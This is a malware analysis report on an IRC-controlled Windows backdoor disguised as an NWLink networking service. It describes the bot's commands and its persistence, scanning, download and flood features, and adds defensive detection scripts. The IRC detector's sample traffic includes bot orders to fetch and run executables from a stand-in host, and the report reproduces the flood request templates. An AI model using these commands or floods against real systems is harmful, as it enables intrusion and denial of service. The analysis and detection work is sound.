Virus name: Backdoor.Win32.VB.xl (ipxsrv.exe), Backdoor.Win32.VB.xl (nwlink.exe)
Virus type: Windows backdoor (trojan)
Threat level: high
File length: nwlink.exe 160,256 bytes; ipxsrv.exe 160,256 bytes
Affected systems: Windows NT and later
Written in: Visual Basic 5.0/6.0
Virus description:
The file icon imitates the Local Area Connection icon in order to mislead the user. ipxsrv.exe and nwlink.exe do not open a listening port; functionally the control scheme resembles an IRC bot backdoor, and the bot has to satisfy some condition before it becomes active. After infection it drops two files into %Windir%\System32: nwlink.exe (160,256 bytes) and ipxsrv.exe (160,256 bytes). It starts a service named "NWLink IPX Compatible Transport Protocol" (the name of a legitimate Windows networking component, chosen to blend in) and adds nwlink.exe and ipxsrv.exe to the process list. It can carry out denial-of-service attacks. Through its controller (called the "client" in this report; "server" means the bot component running on the infected host) it can scan, upload files, download files, upgrade the bot, report the victim's operating system version and language, processor type and URL information, and perform HTTP, SMTP and SCAN related operations. It modifies the registry, adding autorun entries under:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
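The host indicators above (two fixed-size files in System32, two autorun values, the masquerading service name and the two process names) are easy to check mechanically. The following Python script is an added example, not a tool from the vendor report: find_indicators() runs over a snapshot dictionary so it can be exercised offline against the constructed SAMPLE_SNAPSHOT, and collect_windows_snapshot() builds that same dictionary from a live Windows host with the standard winreg and os modules (the service and process lists are left for the operator to fill from sc query / tasklist). The snapshot layout, the paths and the sample values are this example's own assumptions.

```python
"""Host triage for the Backdoor.Win32.VB.xl indicators (added example)."""
import ntpath
import os
import sys

# Indicators taken from the description above.
DROPPED_FILES = {"nwlink.exe": 160_256, "ipxsrv.exe": 160_256}
RUN_KEYS = (
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
)
SERVICE_NAME = "NWLink IPX Compatible Transport Protocol"


def _image_name(value):
    """Executable name from an autorun value such as
    'C:\\WINDOWS\\System32\\nwlink.exe' or '"C:\\...\\nwlink.exe" /arg'."""
    tokens = str(value).strip('"').split('"')[0].split()
    return ntpath.basename(tokens[0]).lower() if tokens else ""


def find_indicators(snapshot):
    """Return (indicator_kind, detail) tuples for every match in a snapshot:
    {"files": {path: size}, "registry": {key: {name: data}},
     "services": [display names], "processes": [image names]}."""
    findings = []
    for path, size in snapshot.get("files", {}).items():
        name = ntpath.basename(path).lower()
        if name in DROPPED_FILES:
            # nwlink is also a legitimate component name; the exact size from
            # the report separates the dropped file from a coincidence.
            strength = "strong" if size == DROPPED_FILES[name] else "weak"
            findings.append(("dropped_file", f"{path} ({size} bytes, {strength})"))
    for key, values in snapshot.get("registry", {}).items():
        if key in RUN_KEYS:
            for value_name, data in values.items():
                if _image_name(data) in DROPPED_FILES:
                    findings.append(("autorun", f"{key}\\{value_name} = {data}"))
    for svc in snapshot.get("services", []):
        if svc == SERVICE_NAME:
            findings.append(("service", svc))
    for proc in snapshot.get("processes", []):
        if proc.lower() in DROPPED_FILES:
            findings.append(("process", proc))
    return findings


def collect_windows_snapshot():
    """Build the snapshot from the live host (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live collection only works on Windows")
    import winreg
    system32 = os.path.join(os.environ["WINDIR"], "System32")
    files = {}
    for name in DROPPED_FILES:
        path = os.path.join(system32, name)
        if os.path.exists(path):
            files[path] = os.path.getsize(path)
    registry = {}
    for key_path in RUN_KEYS:
        subkey = key_path.split("\\", 1)[1]
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as k:
                values, i = {}, 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(k, i)
                    except OSError:          # no more values
                        break
                    values[name] = data
                    i += 1
                registry[key_path] = values
        except OSError:                      # key absent
            pass
    # services/processes: fill from `sc query` / `tasklist` output if wanted.
    return {"files": files, "registry": registry, "services": [], "processes": []}


# Constructed snapshot of an infected host (assumed values, not real data).
SAMPLE_SNAPSHOT = {
    "files": {
        r"C:\WINDOWS\System32\nwlink.exe": 160_256,
        r"C:\WINDOWS\System32\ipxsrv.exe": 160_256,
        r"C:\WINDOWS\System32\kernel32.dll": 983_040,
    },
    "registry": {
        RUN_KEYS[0]: {"nwlink": r"C:\WINDOWS\System32\nwlink.exe",
                      "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
        RUN_KEYS[1]: {"ipxsrv": r'"C:\WINDOWS\System32\ipxsrv.exe"'},
    },
    "services": ["Workstation", SERVICE_NAME],
    "processes": ["explorer.exe", "nwlink.exe", "ipxsrv.exe"],
}

if __name__ == "__main__":
    snap = collect_windows_snapshot() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for kind, detail in find_indicators(snap):
        print(f"{kind:13} {detail}")
```

The file-size match is what makes the file finding "strong": a file merely named nwlink.exe is not diagnostic on its own, since NWLink is a real Windows component name, while the 160,256-byte size is specific to this sample.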
Behavior analysis:
1. IRCX function
Commands: S- ping/pong/IRCX/JOIN/MODE/Creat/join/i/privmsg/kick/nick/app/-close-multi/name
Explanation of some of the commands:
IRCX: used to find out whether the server supports IRCX. Some IRCX commands with extended functions carry extra parameters; in particular /mode with its additional modes is only supported by IRCX servers. The command can also be used to query the server's IRCX compatibility.
/Create []: creates a new chat room and sets its properties.
/Join []: creates or joins a chat room.
/Kick []: used by the room operator to expel a user from a given chat room.
/MOTD: displays the server's message of the day in the status window.
/Nick: changes the nickname.
/Privmsg: identical to the /Msg command.
/Privmsg {,}: if a nickname is given, the message is sent as a whisper to one or more users;
if a chat room name is given, it is sent as an ordinary message to everyone in that room.
i: sets invitation-only room mode.
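Because the bot takes its orders over ordinary IRC PRIVMSG traffic, the command vocabulary listed in this section and in section 3 is the most practical network signature. The script below is an added example, not part of the original report: it parses IRC lines into prefix, command, parameters and trailing text, then flags an IRCX capability probe and any PRIVMSG whose first word is one of the bot's commands. The sample lines, the channel name and the controller nick are constructed.

```python
"""Flag IRC traffic that matches the bot's command vocabulary (added example)."""

# Bot-side command words from sections 1 and 3 of the report.
BOT_COMMANDS = {
    "-comtupername", "-cpu", "-localtime", "-localip", "-memory", "-sysdir",
    "-sysver", "-username", "-windir", "-irc", "-pop", "-port", "-proc",
    "-install", "-kill", "-list", "-reg", "-start", "-task", "-task-list",
    "-boot", "-check", "-m", "-updata", "-close-multi", "halt", "download",
}


def parse_irc_line(line):
    """Split one IRC line into (prefix, COMMAND, [params], trailing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return prefix, "", [], trailing
    return prefix, parts[0].upper(), parts[1:], trailing


def flag_bot_traffic(lines):
    """Return (line_number, reason) for each line that looks like bot C2."""
    hits = []
    for n, raw in enumerate(lines, 1):
        prefix, cmd, params, trailing = parse_irc_line(raw)
        if cmd == "IRCX":
            # Ordinary clients rarely send a bare IRCX capability probe.
            hits.append((n, "IRCX capability probe"))
            continue
        if cmd == "PRIVMSG" and trailing:
            words = trailing.split()
            first = words[0].lower() if words else ""
            if first in BOT_COMMANDS:
                target = params[0] if params else "?"
                hits.append((n, f"bot command {first!r} from {prefix} to {target}"))
    return hits


# Constructed session: a bot joining a control channel and receiving orders.
SAMPLE_LINES = [
    "NICK bot-1234",
    "USER bot 0 * :bot",
    "IRCX",
    "JOIN #ctrl",
    "PING :irc.example.test",
    "PONG :irc.example.test",
    ":op!op@10.0.0.1 PRIVMSG #ctrl :-comtupername",
    ":op!op@10.0.0.1 PRIVMSG #ctrl :-cpu",
    ":op!op@10.0.0.1 PRIVMSG #ctrl :-updata http://example.test/new.exe",
    ":alice!a@10.0.0.2 PRIVMSG #general :hello everyone",
    ":op!op@10.0.0.1 PRIVMSG bot-1234 :download http://example.test/x.exe 0",
]

if __name__ == "__main__":
    for line_no, reason in flag_bot_traffic(SAMPLE_LINES):
        print(f"line {line_no}: {reason}")
```

The dash-prefixed commands are unlikely to appear as the first word of human chat, but "halt" and "download" are ordinary words, so in production those two should be weighted lower or required to co-occur with the IRCX probe or a dash command from the same sender.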
2. Download function
Downloading is subject to several conditions: an execute style mode chosen from 0 to 6 and the name of the file to execute must be supplied; "." marks the end of the input.
Failed to execute file [ ]. (file execution failed)
File name is requirement. (error: file name missing)
Try deleted file [ ] failed. (file deletion failed)
Delete file [ ]has succeed. (file deleted)
ERR: Source file name and destination file name are requirement. (file rename failed: names missing)
Rename [ ] => [ ] has succeed. (file renamed)
Failed: Source file [ ] is not exist. (source file [ ] does not exist)
Try remove files( ) has completed. (files removed)
Other strings: Execute style mode is requirement
Execute file name is requirement
Execute style mode must between 0 to 6
The 0 to 6 range is the same as the WindowStyle argument of the Visual Basic Shell() function (vbHide = 0 through vbMinimizedNoFocus = 6), which is consistent with the sample being written in VB; the mode most likely only controls whether the window of the executed file is shown or hidden. This is an inference from the strings and has not been confirmed dynamically.
3. Collection of computer information, and some of the commands
-comtupername computer name
-cpu CPU information
-localtime -t server (victim) time
-localip -ip server IP address
-memory -mem memory information
-sysdir system folders
-sysver system version
-username -u server user name
-windir Windows folder
-irc IRC service
-pop POP3 service
-port port number
-proc processes
-install . install; after installation it runs as a service
halt suspend
download download a file
-localtime server local time
-localip server local IP
-memory get memory size
-user get user
-windir list the Windows directory
-tcpd can be used for reverse DNS resolution
-kill killedid (kill by ID)
-list process list
-reg registry functions
-start start service
-task -task-list task number
admissive (allowed) -boot -check
-m list files under winnt or windows
4. Transmission function (currently judged to be used for HTTP FLOOD):
POST /
Content-Type: application/x-www-form-urlencoded
Content-Length:
Cache-Control: no-cache
5. Process termination commands
Killed: [ ] processess killed. (done)
-list list the process table
Failed: [ ] isn't in processes list. (process does not exist)
Failed: PID isn't in processes list. (PID not in the process list)
6. Determines the language used on the server (victim) side; the built-in language names are listed below. The list, including the "Windows 2000: ... This is Unicode only." entries, is copied from the language identifier table of the Platform SDK documentation of that period, so the bot most likely maps the result of a locale query (for example GetUserDefaultLangID) onto these names.
Process Default Language
"Afrikaans"
"Albanian"
"Arabic (Saudi Arabia)"
"Arabic (Iraq)"
"Arabic (Egypt)"
"Arabic (Libya)"
"Arabic (Algeria)"
"Arabic (Morocco)"
"Arabic (Tunisia)"
"Arabic (Oman)"
"Arabic (Yemen)"
"Arabic (Syria)"
"Arabic (Jordan)"
"Arabic (Lebanon)"
"Arabic (Kuwait)"
"Arabic (U.A.E.)"
"Arabic (Bahrain)"
"Arabic (Qatar)"
"Windows 2000: Armenian. This is Unicode only."
"Windows 2000: Assamese. This is Unicode only."
"Azeri (Latin)"
"Azeri (Cyrillic)"
"Basque"
"Belarussian"
"Windows 2000: Bengali. This is Unicode only."
"Bulgarian"
"Burmese"
"Catalan"
"Chinese (Taiwan Region)"
"Chinese (PRC)"
"Chinese (Hong Kong SAR, PRC)"
"Chinese (Singapore)"
"Chinese (Macau)"
"Croatian"
"Czech"
"Danish"
"Dutch (Netherlands)"
"Dutch (Belgium)"
"English (United States)"
"English (United Kingdom)"
"English (Australian)"
"English (Canadian)"
"English (New Zealand)"
"English (Ireland)"
"English (South Africa)"
"English (Jamaica)"
"English (Caribbean)"
"English (Belize)"
"English (Trinidad)"
"English (Zimbabwe)"
"English (Philippines)"
"Estonian"
"Faeroese"
"Farsi"
"Finnish"
"French (Standard)"
"French (Belgian)"
"French (Canadian)"
"French (Switzerland)"
"French (Luxembourg)"
"French (Monaco)"
"Windows 2000: Georgian. This is Unicode only."
"German (Standard)"
"German (Switzerland)"
"German (Austria)"
"German (Luxembourg)"
"German (Liechtenstein)"
"Greek"
"Windows 2000: Gujarati. This is Unicode only."
"Hebrew"
"Windows 2000: Hindi. This is Unicode only."
"Hungarian"
"Icelandic"
"Indonesian"
"Italian (Standard)"
"Italian (Switzerland)"
"Japanese"
"Windows 2000: Kannada. This is Unicode only."
"Kashmiri (India)"
"Kazakh"
"Windows 2000: Konkani. This is Unicode only."
"Korean"
"Korean (Johab)"
"Latvian"
"Lithuanian"
"Lithuanian (Classic)"
"Macedonian"
"Malay (Malaysian)"
"Malay (Brunei Darussalam)"
"Windows 2000: Malayalam. This is Unicode only."
"Manipuri"
"Windows 2000: Marathi. This is Unicode only."
"Windows 2000: Nepali (India). This is Unicode only."
"Norwegian (Bokmal)"
"Norwegian (Nynorsk)"
"Windows 2000: Oriya. This is Unicode only."
"Polish"
"Portuguese (Brazil)"
"Portuguese (Standard)"
"Windows 2000: Punjabi. This is Unicode only."
"Romanian"
"Russian"
"Windows 2000: Sanskrit. This is Unicode only."
"Serbian (Cyrillic)"
"Serbian (Latin)"
"Sindhi"
"Slovak"
"Slovenian"
"Spanish (Traditional Sort)"
"Spanish (Mexican)"
"Spanish (Modern Sort)"
"Spanish (Guatemala)"
"Spanish (Costa Rica)"
"Spanish (Panama)"
"Spanish (Dominican Republic)"
"Spanish (Venezuela)"
"Spanish (Colombia)"
"Spanish (Peru)"
"Spanish (Argentina)"
"Spanish (Ecuador)"
"Spanish (Chile)"
"Spanish (Uruguay)"
"Spanish (Paraguay)"
"Spanish (Bolivia)"
"Spanish (El Salvador)"
"Spanish (Honduras)"
"Spanish (Nicaragua)"
"Spanish (Puerto Rico)"
"Sutu"
"Swahili (Kenya)"
"Swedish"
"Swedish (Finland)"
"Windows 2000: Tamil. This is Unicode only."
"Tatar (Tatarstan)"
"Windows 2000: Telugu. This is Unicode only."
"Thai"
"Turkish"
"Ukrainian"
"Urdu (Pakistan)"
"Urdu (India)"
"Uzbek (Latin)"
"Uzbek (Cyrillic)"
"Vietnamese"
"Unknown New Language"
7. Server (bot) upgrade
-updata downloads over port 80
-r fail to run[ ].
exec (process information: description, PID)
-l local:
-d
-e
-o
Messages:
ERR: Unknown downloading status, client will close
Downloading... OVERWRITE
Downloading... bytes/remote:
Downloading... bytes/sec
Download completed.
Failed: Response file length is different than content length.
ERR: Socket error( )
Failed: Download client didn't ready.
Failed: No parameters found.
ERR: Protocal name doesn't found.
ERR: Environ [ ] doesn't exist.
ERR: Illegal local file name. [ ].
ERR: has been exist.
ERR: Socket did not ready.
8. Obtains the server's operating system version; the built-in version strings are as follows:
Windows 32s
Windows NT
Windows 95
Windows9x
Windows NT 4
WindowsNT
Windows NT 5.0
Windows2000
Windows NT 5.1
WindowsXP
Windows NT 5.2
Windows2003
9. Obtains the server's processor type; the built-in strings are as follows. These five names correspond exactly to the documented dwProcessorType values returned by GetSystemInfo (PROCESSOR_INTEL_386, PROCESSOR_INTEL_486, PROCESSOR_INTEL_PENTIUM, PROCESSOR_MIPS_R4000, PROCESSOR_ALPHA_21064), so the bot most likely calls GetSystemInfo; on any x86 processor newer than a Pentium that field still reports the Pentium value, so the information is of little use for fingerprinting:
"Intel 386 Processor"
"Intel 486 Processor"
"Intel Pentium Processor"
"MIPS R4000 Processor"
"DEC Alpha 21064 Processor"
10. Obtains the server's browser version; the built-in browser version strings are as follows (truncated as extracted). Given that there are eighteen of them and that the bot assembles its own HTTP requests (sections 4, 12 and 16), it is at least as plausible that this is a pool of User-Agent values the bot picks from when sending requests as that it detects the victim's browser; this is an analyst inference:
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.01; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0b; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
"Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
"Mozilla/4.0 (compatible; MSIE 6.0b; Win"...
"Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
11. SCAN function: Scan port, start ipaddr, end ipaddr, all are requirement
Connection scan: connected.
Scan [ ] to [ ] has completed.
ip#s will scan( clients ).
Scan errors: ERR: illegal port number [ ].
ERR: illegal start ipaddr [ ].
ERR: illegal end paddr [ ]
ERR: You must make lesser IP address forward. (the start address must be lower than the end address)
Stop scan: Stop scan [ ].
No active scaning
12. User-Agent function (request headers the bot sends):
User-Agent:
Host:
Connection: Keep-Alive
13. "Help" strings
Index
Number
Description
Scode
Source
HelpFile
HelpContext
CancelDisplay
These eight names, in this order, are the parameter names of the Error event of the Microsoft Winsock control as declared for a control array (Index, Number, Description, Scode, Source, HelpFile, HelpContext, CancelDisplay). They are far more likely to be residue of the bot's socket error handlers than a help feature, and they indicate that the bot uses a Winsock control array for its connections.
14. ICMP FLOOD
Calls IcmpSendEcho to send ICMP echo requests through an opened ICMP handle; the call returns on timeout or when a reply packet is received.
Strings:
Stop sending to (stop sending data)
Start sending to (start sending data)
No active ICMP working (no ICMP flood running)
Stop tcp to(clients) / start tcp to(clients)
No active tcp in working.
Stop flood port on (clients) and start flood port on (clients)
No active flood port working.
Stop full port on
start full port on
No active full port working.
15. Sending through an SMTP service: can be reset, can obtain the domain name of the SMTP mail server,
and uses the HELO command with a parameter.
Server replies: 220 service ready
250 requested mail action completed
354 start mail input, end with a line containing only "."
The HELO command has a known weakness: "helo hostname" is the greeting the client sends so that the SMTP server can identify it, but the client can put any hostname it likes in it, so a receiving server must not trust that name.
Strings: SMTP service closed
SMTP service data arrived
SMTP service error
(these three match the Close, DataArrival and Error events of a Winsock control handling the SMTP connection)
16. Start / stop a DDoS attack against an SMTP server
Strings: Start / Stop smtp sending to
Start / Stop smtp sending to
Start / Stop ending to
Error start sending to [ ] is an illegal port.
No active UDP working.
No active smtp send working.
Can't resolve name.
Failed: Target port is requirement.
Failed: Target host/ipaddr is requirement.
Failed: Illegal web host name []
Failed: Illegal smtp host/ip []
Failed: Illegal smtp domain name.
Failed: Can't resolve ip address by name [
Failed: Can't resolve smtp host [
Failed: Smtp mail domain is requirement.
Failed: Smtp host/ip is requirement.
GET / command, related parameters /c /s /n /u /h (also suspected to be used for HTTP FLOOD)
Port 80
Units: KBytes/sec, KB/Sec
:// ERR: Protocal name doesn't found.
http Failed: [ ] protocol does not support.
http:// Can't resolve name.
/n /r /p: the client can refresh and stop refreshing
ERR: Unknown http type [ ].
ERR: URL is requirement.
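The POST template in section 4 and the GET / request with the Keep-Alive and MSIE User-Agent headers of section 12 are the two request shapes the report suspects of being used for HTTP flooding. The following script is an added example, not part of the original report: it parses raw HTTP/1.x requests, matches them against those two shapes, and reports any source that sends more than a threshold of shaped requests inside a sliding one-second window. The sample traffic, the addresses, the host name and the threshold are constructed; the shape alone is not diagnostic (every Internet Explorer of the era sent GET / with Keep-Alive), so the rate is the real discriminator.

```python
"""HTTP flood detection for the bot's request shapes (added example)."""
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0
THRESHOLD = 20   # more shaped requests than this per source per window = flood


def parse_request(raw):
    """Return (method, target, headers) from a raw HTTP/1.x request string.
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def matches_bot_shape(method, target, headers):
    """True for the POST / template of section 4 or the GET / shape of
    section 12 (Keep-Alive plus an MSIE User-Agent from section 10)."""
    if target != "/":
        return False
    if method == "POST":
        return (headers.get("content-type") == "application/x-www-form-urlencoded"
                and headers.get("cache-control") == "no-cache")
    if method == "GET":
        return (headers.get("connection", "").lower() == "keep-alive"
                and headers.get("user-agent", "").startswith("Mozilla/4.0 (compatible; MSIE "))
    return False


def detect_flood(events):
    """events: iterable of (timestamp_seconds, source_ip, raw_request).
    Returns {source_ip: peak_count} for sources exceeding THRESHOLD shaped
    requests within any WINDOW_SECONDS window."""
    recent = defaultdict(deque)
    offenders = {}
    for ts, src, raw in sorted(events, key=lambda e: e[0]):
        method, target, headers = parse_request(raw)
        if not matches_bot_shape(method, target, headers):
            continue
        window = recent[src]
        window.append(ts)
        while window and ts - window[0] > WINDOW_SECONDS:
            window.popleft()
        if len(window) > THRESHOLD:
            offenders[src] = max(offenders.get(src, 0), len(window))
    return offenders


# Constructed requests (assumed host name, addresses and User-Agent).
POST_TEMPLATE = ("POST / HTTP/1.1\r\nHost: www.example.test\r\n"
                 "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "Content-Length: 0\r\nCache-Control: no-cache\r\n"
                 "Connection: Keep-Alive\r\n\r\n")
NORMAL_GET = ("GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n"
              "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")


def sample_events():
    """One bot sending 50 POSTs within a second, one ordinary client."""
    events = [(i * 0.02, "198.51.100.7", POST_TEMPLATE) for i in range(50)]
    events += [(i * 0.5, "203.0.113.9", NORMAL_GET) for i in range(10)]
    return events


if __name__ == "__main__":
    for src, peak in detect_flood(sample_events()).items():
        print(f"{src}: {peak} shaped requests in {WINDOW_SECONDS}s")
```

A single bot is easy to spot this way; a distributed flood from many infected hosts needs the same counting keyed on the target rather than the source, with the POST-with-empty-body shape as the common factor.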
17. Mail sending function
MAIL FROM: < (sender address)
RCPT TO: < (SMTP command identifying the recipient; may contain the client user's email address)
DATA (the message body)
Summary: this is a fairly capable backdoor, but under the current test conditions it has not been possible to determine how the backdoor activates itself, so the analysis above is essentially based on static analysis.
We currently consider the following activation methods possible:
(1) At a specific time the backdoor actively connects to an IRC server and executes IRC scripts.
(2) Under specific conditions the backdoor sends an IP notification email and waits for the controlling side to connect to it.
(3) The backdoor needs a client to control it; the client sends a specific authentication string, which activates the backdoor.
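Sections 15 and 17 together describe the full SMTP exchange the bot performs (HELO, MAIL FROM, RCPT TO, DATA, terminating "."), and section 15 notes that the HELO name is whatever the client chooses. The script below is an added example, not code from the original report: it plays a constructed bot session against a minimal server-side SMTP state machine that produces the 220/250/354 replies listed above, enforces command order, and records when the HELO name disagrees with the reverse DNS name of the peer. The peer address, host names, mailbox names and the injected rdns table are assumptions; a real receiver would call socket.gethostbyaddr instead of the table.

```python
"""SMTP exchange with HELO/rDNS consistency check (added example)."""


def run_smtp_session(client_lines, peer_ip, rdns):
    """Feed client lines to a minimal SMTP receiver.

    rdns: {peer_ip: reverse DNS name}, injected so the example runs offline.
    Returns (transcript, findings); transcript is a list of ("C"/"S", line)
    pairs, findings a list of policy observations about the session."""
    transcript = [("S", "220 mx.example.test ESMTP ready")]
    findings = []
    state = "greeting"          # greeting -> greeted -> mail -> rcpt -> data
    in_data = False
    for line in client_lines:
        transcript.append(("C", line))
        if in_data:
            if line == ".":      # lone dot ends the message body (354 reply)
                in_data = False
                state = "greeted"
                transcript.append(("S", "250 OK: queued"))
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            claimed = arg.strip()
            actual = rdns.get(peer_ip)
            # The greeting is client-supplied; only rDNS of the socket peer is
            # something the server observed itself.
            if actual is None or claimed.lower() != actual.lower():
                findings.append(f"HELO name {claimed!r} does not match rDNS of {peer_ip} ({actual})")
            transcript.append(("S", f"250 mx.example.test Hello {claimed} [{peer_ip}]"))
            state = "greeted"
        elif verb == "MAIL" and state == "greeted":
            transcript.append(("S", "250 OK"))
            state = "mail"
        elif verb == "RCPT" and state in ("mail", "rcpt"):
            transcript.append(("S", "250 OK"))
            state = "rcpt"
        elif verb == "DATA" and state == "rcpt":
            transcript.append(("S", "354 End data with <CR><LF>.<CR><LF>"))
            in_data = True
        elif verb == "QUIT":
            transcript.append(("S", "221 Bye"))
            break
        else:
            transcript.append(("S", "503 Bad sequence of commands"))
            findings.append(f"out-of-order {verb} in state {state}")
    return transcript, findings


# Constructed bot session: an IP notification mail as hypothesised in the summary.
BOT_SESSION = [
    "HELO mail.victim-pc.local",          # name chosen by the client
    "MAIL FROM:<bot@victim-pc.local>",
    "RCPT TO:<operator@example.test>",
    "DATA",
    "Subject: ip notify",
    "",
    "192.0.2.25",
    ".",
    "QUIT",
]
PEER_IP = "192.0.2.25"
RDNS_TABLE = {PEER_IP: "dyn-25.isp.example.net"}   # assumed rDNS result

if __name__ == "__main__":
    transcript, findings = run_smtp_session(BOT_SESSION, PEER_IP, RDNS_TABLE)
    for side, line in transcript:
        print(f"{side}: {line}")
    for f in findings:
        print("finding:", f)
```

A HELO/rDNS mismatch is common for misconfigured but legitimate senders, so on its own it is a scoring input rather than a block decision; combined with the flood-rate behaviour of section 16 against the same receiver it becomes a strong signal.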